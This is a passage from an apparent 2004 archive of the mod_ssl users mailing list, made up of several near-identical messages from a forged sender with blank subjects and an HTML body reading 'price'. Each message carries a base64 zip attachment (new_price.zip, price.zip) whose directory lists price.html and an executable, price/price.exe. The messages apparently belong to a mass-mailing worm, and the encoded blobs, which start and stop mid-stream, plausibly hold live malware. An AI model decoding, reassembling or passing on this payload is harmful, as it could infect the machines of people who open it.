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

----------gqxlwiwctptjpixctqcd--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:46:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 775F8A8D0E; Mon,  9 Aug 2004 22:46:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dell-4m2rm11.org (flame.gabelli.com [216.73.19.34])
	by master.modssl.org (Postfix) with SMTP id C4718A893D
	for ; Mon,  9 Aug 2004 22:46:27 +0200 (CEST)
Date: Mon, 09 Aug 2004 16:46:22 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------zrglotoqbiczagnbauis"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------zrglotoqbiczagnbauis
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


  price







----------zrglotoqbiczagnbauis
Content-Type: application/octet-stream; name="new_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="new_price.zip"

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

----------zrglotoqbiczagnbauis--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:54:37 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 07158A8945; Mon,  9 Aug 2004 22:54:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from laptop.net (adsl-67-39-27-222.dsl.dytnoh.ameritech.net [67.39.27.222])
	by master.modssl.org (Postfix) with SMTP id 2C7C9A893A
	for ; Mon,  9 Aug 2004 22:54:30 +0200 (CEST)
Date: Mon, 09 Aug 2004 16:54:28 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------qfrtwfcxcoizohopwlby"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------qfrtwfcxcoizohopwlby
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


  price







----------qfrtwfcxcoizohopwlby
Content-Type: application/octet-stream; name="price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price.zip"

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
